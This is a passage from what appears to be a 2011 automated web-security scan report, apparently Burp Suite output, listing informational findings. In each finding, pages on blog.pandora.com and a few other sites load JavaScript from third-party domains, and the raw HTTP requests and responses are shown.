17.25. http://blog.pandora.com/pandora/archives/north-dakota/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-dakota/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/north-dakota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:02 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "854005-3d1f-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 15647
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.26. http://blog.pandora.com/pandora/archives/ohio/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/ohio/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/ohio/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:47 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc4f6-501e-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 20510
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.27. http://blog.pandora.com/pandora/archives/oregon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/oregon/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/oregon/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT
ETag: "7cc548-6ec7-49881a23db9c0"
Accept-Ranges: bytes
Content-Length: 28359
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.28. http://blog.pandora.com/pandora/archives/other-states/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other-states/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/other-states/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "854009-4f24-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 20260
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.29. http://blog.pandora.com/pandora/archives/other_states/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/other_states/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/other_states/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc3ae-4f24-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 20260
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.30. http://blog.pandora.com/pandora/archives/pennsylvania/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/pennsylvania/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/pennsylvania/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc3b0-5fee-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 24558
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.31. http://blog.pandora.com/pandora/archives/play-listen-repeat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/play-listen-repeat/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/play-listen-repeat/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:51 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "7ce0d6-4585-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 17797
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.32. http://blog.pandora.com/pandora/archives/rhode-island/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/rhode-island/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/rhode-island/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7ce1b3-439f-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 17311
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.33. http://blog.pandora.com/pandora/archives/roadtrip/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/roadtrip/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

17.34. http://blog.pandora.com/pandora/archives/roadtrip/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/roadtrip/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

17.35. http://blog.pandora.com/pandora/archives/south-daktoa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/south-daktoa/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/south-daktoa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:55:49 GMT
ETag: "84e00b-4a57-4990aa7b19b40"
Accept-Ranges: bytes
Content-Length: 19031
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.36. http://blog.pandora.com/pandora/archives/tennessee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/tennessee/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/tennessee/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:53 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7cc0b2-5249-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 21065
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.37. http://blog.pandora.com/pandora/archives/texas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/texas/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/texas/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:55 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7cc3a8-8e62-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 36450
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.38. http://blog.pandora.com/pandora/archives/utah/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/utah/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/utah/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc50c-46e3-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 18147
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.39. http://blog.pandora.com/pandora/archives/virginia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/virginia/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/virginia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

17.40. http://blog.pandora.com/pandora/archives/washington-dc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington-dc/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/washington-dc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7ce1d4-4d1d-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 19741
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.41. http://blog.pandora.com/pandora/archives/washington/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/archives/washington/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc584-52e1-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 21217
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

17.42. http://board-games.pogo.com/games/monopoly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/monopoly

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://www.java.com/js/deployJava.js

Request

Response

17.43. http://dean.edwards.name/weblog/2006/06/again/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The response dynamically includes the following script from another domain:

http://deanedwardsoffline.appspot.com/js/my.js

Request

GET /weblog/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:08:11 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sun, 09 Jan 2011 02:08:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 213580

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://d
...[SNIP]...
<link rel="icon" href="/favicon.ico" type="image/x-icon">
<script src="http://deanedwardsoffline.appspot.com/js/my.js"></script>
...[SNIP]...

17.44. http://diythemes.com/thesis/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://diythemes.com
Path:	/thesis/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://platform.twitter.com/widgets.js
http://www.statcounter.com/counter/counter.js

Request

GET /thesis/ HTTP/1.1
Host: diythemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:21:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=131fd88d1012eb5a5b3d87a3d5024cda; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://diythemes.com/thesis/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17813

